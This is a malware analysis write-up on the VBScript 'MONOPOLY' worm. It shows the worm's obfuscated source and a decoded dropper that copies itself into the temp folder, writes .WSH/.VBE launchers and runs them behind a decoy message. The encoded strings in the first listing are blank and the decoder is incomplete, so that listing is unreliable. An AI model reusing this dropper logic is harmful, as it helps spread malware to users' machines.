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Source Code

On Error Resume Next
Set A1 = CreateObject(B(""))
Set A2 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(2),B("")),True)
If ScriptEngineMajorVersion > 4 Then
A1.CopyFile WScript.ScriptFullName,A1.BuildPath(A1.GetSpecialFolder(2),B(""))
Set A3 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(2),B("")),True)
A3.Write(B("") & Chr(13) & Chr(10) & B("") & A1.BuildPath(A1.GetSpecialFolder(2),B("")) & Chr(13) & Chr(10))
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(2),B("")),True)
End If
MsgBox B(""),0,""
Set A5 = WScript.CreateObject(B(""))
If ScriptEngineMajorVersion > 4 Then
End If
Function B(B1)
For B2 = 1 To Len(B1)
If InStr(B1,".") <> 0 Then
B = B & Chr(Left(B1,InStr(B1,".") - 1))
B1 = Mid(B1,InStr(B1,".") + 1)
End If
End Function

How it works

Error Handling Disabling:

On Error Resume Next

This line deactivates error handling, meaning if an error occurs in the script, it will continue to run uninterrupted.

Creation of a File System Object:

Set A1 = CreateObject(...)

This part creates an object that allows manipulation of files and folders.

Creation and Writing to a JPEG File:

Set A2 = A1.CreateTextFile(...)

Here, a JPEG file is created and written with specific data. The data is likely encoded and represents the binary content of a JPEG image.

Copying the Current Script:

If ScriptEngineMajorVersion > 4 Then
A1.CopyFile WScript.ScriptFullName,...

This part checks the version of the script engine and copies the script itself to another location, probably for persistence.

Creation of Additional Files: It creates additional files with extensions like .WSH, .VBE, etc., which could be scripts or executable files.

Displaying a Message:

MsgBox ...

A message is displayed to the user, likely to divert their attention or for misinformation purposes.

Execution of Files:


The script executes the files it previously created.

B Decoding Function:

Function B(B1) ...
End Function

This function is used to decode a string, likely employed to mask certain parts of the script.

B Decryption function

The function B is designed to decode a string of numerical values into characters. This function appears to be used for obfuscating or hiding the actual content of the script, making it harder to understand what the script is doing at first glance. Here’s how it works:

  1. Input: The function takes a string as input, where the string is a series of numbers separated by dots (.). Each number represents the ASCII code of a character.

  2. Processing: The function iterates over this string. For each number in the string, it does the following:

    • It finds the number before the first dot (.).
    • It converts this number from ASCII code to the corresponding character using the Chr function.
    • It concatenates this character to a growing result string.
  3. Output: Once all numbers have been processed, the function returns the decoded string.

Here’s an example to illustrate:

  • Input: ""
  • Process:
    • 72 is converted to H
    • 101 is converted to e
    • 108 is converted to l
    • 108 is converted to l
    • 111 is converted to o
  • Output: The function would return "Hello"

In essence, this function is a simple method to encode strings in a non-readable format and then decode them at runtime, which can be a technique used in scripts to hide potentially malicious actions or data.

Code decrypted

We will decode now the encoded character strings in the script you provided using the B function indicated in the script, except for the part that creates the image, as it seems to contain a large amount of binary data.

The B function in the VBScript appears to convert a series of numbers separated by dots into characters, using their ASCII value. I will apply this decoding to all the encoded strings.

Let’s proceed with the decoding:

Here is the script rewritten with the decoded character strings:

On Error Resume Next
Set A1 = CreateObject("Scripting.FileSystemObject")
Set A2 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(2),"MONOPOLY.JPG"),True)

' ... The image creation part is left as it is ...


If ScriptEngineMajorVersion > 4 Then
    A1.CopyFile WScript.ScriptFullName, A1.BuildPath(A1.GetSpecialFolder(2), "MONOPOLY.VBS")
    Set A3 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(2), "MONOPOLY.WSH"), True)
    A3.Write("[ScriptFile]" & Chr(13) & Chr(10) & "Path=" & A1.BuildPath(A1.GetSpecialFolder(2), "MONOPOLY.VBE") & Chr(13) & Chr(10))
    Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(2), "MONOPOLY.VBE"), True)

    ' ... The following part seems to be an encoded script written in MONOPOLY.VBE ...

End If

MsgBox "Bill Gates is guilty of monopoly. Here is the proof.", 0, ""
Set A5 = WScript.CreateObject("WScript.Shell")
A5.Run(A1.BuildPath(A1.GetSpecialFolder(2), "MONOPOLY.JPG"))
If ScriptEngineMajorVersion > 4 Then
    A5.Run(A1.BuildPath(A1.GetSpecialFolder(2), "MONOPOLY.WSH"))
End If

In this script, the names of files and character strings have been decoded for better understanding. Note that the part concerning the creation of the image and the encoded script written in MONOPOLY.VBE has not been modified, as the former contains binary data and the latter appears to be a complex encoded script.

  • https://bazaar.abuse.ch/sample/5cd3c387b9324e048ba925640a464ad330feca96eeb90eb0e568421c2b9eb7e7/
  • https://www.virustotal.com/gui/file/5cd3c387b9324e048ba925640a464ad330feca96eeb90eb0e568421c2b9eb7e7
  • https://mwdb.cert.pl/file/8a2b52c6c2cc833f3838bfa739d018dd69327941d68b6fed89fedde67ab2b973

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